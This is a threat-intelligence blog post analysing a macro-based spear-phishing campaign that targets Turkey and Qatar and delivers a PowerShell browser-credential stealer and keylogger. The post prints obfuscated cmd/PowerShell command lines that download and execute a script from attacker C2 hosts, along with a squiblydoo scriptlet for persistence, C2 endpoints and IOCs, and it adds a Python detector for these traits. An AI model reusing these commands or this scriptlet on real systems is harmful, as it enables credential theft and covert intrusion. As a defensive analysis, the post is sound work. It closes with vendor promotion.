During our daily threat hunting activities we came across a tweet reporting an active spear-phishing campaign apparently targeting Turkey. After an initial assessment we decided to investigate further, finding similarities with other campaigns active in the recent past and possibly coming from the same actors.
https://twitter.com/_jsoo_/status/1068045034203697152
Spear-phishing Documents
The spear-phishing documents target Turkish victims, and we managed to find an older one targeting victims in Qatar. The documents try to lure people toward the conference of the association “Parliamentarians for Al Quds” in Istanbul. The Parliamentarians for Al Quds is a committee that coordinates “the efforts of international parliamentarians to support the Palestine cause“.


Google Translate helps non-Arabic speakers make sense of the content crafted for the spear-phishing campaign:

The document is an invitation to the conference, to be held from the 13th to the 16th of December under the title “Jerusalem is the eternal capital of Palestine“. No announcement related to this conference is currently published on the official website.
Infection strategy
Both documents follow the same traditional infection strategy: trying to lure the victims into clicking on the “enable content” button to run a malicious macro:

The embedded macro runs a command prompt invoking PowerShell, which in turn runs a .ps1 script downloaded from a malicious host.
We have reconstructed the storyline using ReaQta-Hive:

Winword.exe can be seen spawning an instance of cmd.exe with a suspicious command line:
"C:\Windows\System32\cmd.exe" /c " EcHo iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( 'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )^^^| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -"
Deobfuscating the command line reveals the real parameters passed to powershell.exe:
IEX (New-Object Net.WebClient).DownloadString('http://microsoftdata.linkpc.net/api/cscript')
The way arguments are passed to powershell.exe is interesting, as it appears to be a method to evade command-line monitoring:
pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -
The script is “echoed” (piped) directly into powershell.exe, which is why the usual iEx [...] parameter does not appear in the powershell.exe command line.
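To show how the two traits described above can be caught from process telemetry, here is an added Python example (not part of the original analysis): it flags a cmd.exe command line that pipes a script into powershell.exe via the trailing “-”, recognises the base64 + DeflateStream stage, and inflates the embedded blob with a raw-DEFLATE decoder. The command-line samples are the two quoted on this page; the regular expressions and function names are our own.

```python
import base64
import re
import zlib

# Command lines quoted on this page: the current (obfuscated) sample and the August 2018 one.
CMDLINE_NEW = r'''"C:\Windows\System32\cmd.exe" /c " EcHo iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( 'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )^^^| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -"'''
CMDLINE_OLD = r'''"C:\Windows\System32\cmd.exe" /C"Echo\IEX (New-Object Net.WebClient).DownloadString('http://4host.publicvm.com/api/cscript') | PowersHell -NOpROfIL -eX BYpAss -NOlOgo -wiNdoWs HiDdEN -noeXIt -noNI -"'''

# "... | powershell <switches> -": the bare trailing "-" makes powershell.exe read the
# script from standard input, so its argv shows only the switches and none of the payload.
STDIN_PIPE_RE = re.compile(r'\|\s*powershell(?:\.exe)?\b[^|]*\s-\s*"?\s*$', re.IGNORECASE)
DEFLATE_RE = re.compile(r'deflatestream', re.IGNORECASE)
B64_RE = re.compile(r"frombase64string\(\s*'([A-Za-z0-9+/=]+)'", re.IGNORECASE)


def inflate_b64(blob: str):
    """Base64-decode a blob and inflate it as raw DEFLATE (the format .NET DeflateStream emits).
    Returns None when the blob is neither valid base64 nor valid deflate data."""
    try:
        raw = zlib.decompress(base64.b64decode(blob), -15)  # wbits=-15: raw stream, no zlib header
    except (ValueError, zlib.error):
        return None
    return raw.decode("ascii", errors="replace")


def deflate_b64(text: str) -> str:
    """Inverse of inflate_b64; only used to build a constructed blob for the round-trip check."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(text.encode("ascii")) + comp.flush()).decode("ascii")


def analyse_cmdline(cmdline: str) -> dict:
    """Flag the evasion traits seen in this campaign and recover any embedded stage."""
    m = B64_RE.search(cmdline)
    findings = {
        "stdin_pipe": bool(STDIN_PIPE_RE.search(cmdline)),
        "deflate_base64": bool(DEFLATE_RE.search(cmdline) and m),
        "download_string": "downloadstring" in cmdline.lower(),
        "decoded_payload": inflate_b64(m.group(1)) if m else None,
    }
    # Either trait alone is rare in legitimate cmd.exe -> powershell.exe chains.
    findings["suspicious"] = findings["stdin_pipe"] or findings["deflate_base64"]
    return findings


if __name__ == "__main__":
    for name, line in (("new", CMDLINE_NEW), ("old", CMDLINE_OLD)):
        result = analyse_cmdline(line)
        print(name, {k: v for k, v in result.items() if k != "decoded_payload"})
        if result["decoded_payload"]:
            print("  decoded stage:", result["decoded_payload"])
```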
At this point powershell.exe runs the infection routine, leveraging the script downloaded from `hxxp://microsoftdata[.]linkpc[.]net/api/cscript`; below is an excerpt of its content:

The PowerShell script is used to steal cookies, sessions and logins from Chrome, Opera and Firefox, and additionally has a keylogging module. The acquired data is then exfiltrated to the following C2:
hxxp://microsoftdata[.]linkpc[.]net
The script downloads the SQLite DLLs required to interact with the browsers’ local databases (analysis window #4), creates the global mutex Global\rYF1pgeADA to avoid running multiple instances of the stealer, initializes the keylogger, cycles through the functions needed to capture the information and finally establishes persistence.

Particular attention should be given to the persistence mechanism: a scheduled task is used to persist a squiblydoo attack:


The following scriptlet is then executed:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="rYF1pgeADA"
classid="{3cf925ab-14c5-4324-9b5c-bbe294ac03a0}" >
<script language="JScript">
<![CDATA[
p = 'Powershell';
c = ' -WiND hiDdeN -nOproFILe -eXeCUTiON bypaSS -Nol -ComMa "iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( \'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/\') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() "';
r = new ActiveXObject("WScript.Shell").Run(p + c,0,false);
]]>
</script>
</registration>
</scriptlet>
ReaQta-Hive correctly identifies this behavior as anomalous and reconstructs the storyline as reported below:

Stealer Script Capabilities
The script delivered in the spear-phishing campaign, as already mentioned, has the capability to steal cookies and login information from Google Chrome, Firefox and Opera, to log keystrokes, and to persist using a scheduled task that performs a squiblydoo attack. The script also accepts custom scripts deployed from the C2, which means its capabilities can be extended at will by the attackers.
We report the list of function signatures below for future reference:
function Set-Key
function Set-EncryptedData
function Uid
function CookiesTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function PasswordsTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function unProtecte ($data)
function ChromeDB
function FirefoxDB
function OperaDB
function Add-SQLite ($link)
function urlPOST($link,$data)
function OperaSESSION ($SQLiteDB,$search,$condition)
function FirefoxSESSION ($SQLiteDB,$search,$condition)
function ChromeSESSION ($SQLiteDB,$search,$condition)
function ChromePASS ($SQLiteDB)
function BrowsersLOGINS
function _sct
function InstallSCT
function BrowsersPS
function BrowsersLOGGER
function InitLOGGER
function BrowsersCOOKIES ($website,$cname)
The keylogger appears to reuse code from the following GitHub repository:
https://github.com/lazywinadmin/PowerShell/blob/master/TOOL-Start-KeyLogger/Start-KeyLogger.ps1
C2 infrastructure and previous samples
The C2 presents an interesting pattern: the URL path is always /api/{endpoint}:
http://{$domain}/api/cscript
http://{$domain}/api/pscript
http://{$domain}/api/logger/submit
http://{$domain}/api/chrome/submit
http://{$domain}/api/firefox/submit
http://{$domain}/api/opera/submit
http://{$domain}/assest/sqlite
Thanks to the above information, we have been able to discover additional samples using the same pattern in previous spear-phishing campaigns:
Malicious document targeting #Qatar, impersonates @qcharity
Embedded macros download a PowerShell script from:
4host[.]publicvm[.]com/api/cscript
Steals passwords and cookies from browsers
MD5: 9d6ccae4ef4a206345005e58e51ca6cb
— Curly Cyber (@CurlyCyber) August 21, 2018
As pointed out at the beginning, this older sample appeared to target victims in Qatar, at that time by posing as Qatar Charity.
The document was first observed at the beginning of August 2018. There are only minor code changes compared to the current one, mainly slight alterations in behavior, persistence and the script’s code:

We’ve uploaded a behavioral analysis on VirusTotal (click on “detailed report” to access it). In analysis window #1 we can see that cmd.exe’s command line uses no obfuscation:
"C:\Windows\System32\cmd.exe" /C"Echo\IEX (New-Object Net.WebClient).DownloadString('http://4host.publicvm.com/api/cscript') | PowersHell -NOpROfIL -eX BYpAss -NOlOgo -wiNdoWs HiDdEN -noeXIt -noNI -"
For completeness, here are the changes from the previous version of the PowerShell script:
| Capability  | Old Version                     | New Version                   |
|-------------|---------------------------------|-------------------------------|
| Persistence | scheduled task (via powershell) | scheduled task (via regsvr32) |
| Keylogger   | Not found                       | Present                       |
| Mutex       | wfCQnIo2G7                      | rYF1pgeADA                    |
Old panel URL:
hxxp://4host[.]publicvm[.]com/

The three documents share a similar metadata structure:
| Metadata        | Old Version                            | New Version                            |
|-----------------|----------------------------------------|----------------------------------------|
| AppVersion      | 12.0                                   | 16.0                                   |
| Author          | Mohamed Bennabszllah                   | Parliament Quds                        |
| CompObjUserType | Document Microsoft Office Word 97-2003 | Document Microsoft Office Word 97-2003 |
| CreateDate      | 2018:08:05 16:16:00                    | 2018:11:21 14:50:00                    |
| LanguageCode    | English (US)                           | Arabic                                 |
| CodePage        | Windows Latin 1 (Western European)     | Windows Arabic                         |
| LastModifiedBy  | DELL                                   | Mohamed Bennabszllah                   |
| LastPrinted     | 0000:00:00 00:00:00                    | 2018:10:19 17:14:00Z                   |
| ModifyDate      | 2018:08:05 16:32:00                    | 2018:11:22 12:20:00                    |
| System          | Windows                                | Windows                                |
We can observe another similarity: both domains use the same free dynamic DNS service, DNSExit.


Final words
This attack is interesting because of the potential targets involved, but also because of the techniques adopted: usage of system binaries (lolbins) to perform malicious activity via PowerShell, scheduled task persistence, and the “echoing” technique used to hide the command line and make detection harder. This threat actor appears to be active, and the type of documents retrieved suggests that these operations are likely politically motivated and not the work of a cyber crime gang.
Spear-phishing remains one of the most effective vectors, and even trained personnel can easily become victims. ReaQta-Hive helps by automatically detecting targeted threats, like the ones just analysed, using Artificial Intelligence, and it enables analysts to perform in-depth threat hunting and automated discovery of behavioral anomalies. In-memory threats leveraging operating system components (lolbins) are capable of bypassing traditional and legacy defenses while leaving a smaller forensic footprint, given the absence of a traditional binary payload. Get in touch with us for a live demonstration and to understand how to address similar threats in real time.
IOCs
1d2bbe3fd9021bbed4667628b86156bee8763b3d93cdac6de398c751a281a324 دعوة.doc
bf4d4ee4a8e4472c7968586fa0318e556a89bfd94aeb4e72afd99ab340541770 إستمارة.doc
7a26d5b600a078816beb3a2849827fa7d45ec85ec6c3343b3857f10edfece74c cscript.ps1
hxxp://microsoftdata[.]linkpc[.]net
7c8cf1e3ec35a6f604699f6481f3463e9ae19c93b8efd861b914c8260304d314 qatar.doc
hxxp://4host[.]publicvm[.]com
Global\rYF1pgeADA mutex
Global\wfCQnIo2G7 mutex
http://{$domain}/api/cscript
http://{$domain}/api/pscript
http://{$domain}/api/logger/submit
http://{$domain}/api/chrome/submit
http://{$domain}/api/firefox/submit
http://{$domain}/api/opera/submit
http://{$domain}/assest/sqlite
rYF1pgeADA scheduled task name
wfCQnIo2G7 scheduled task name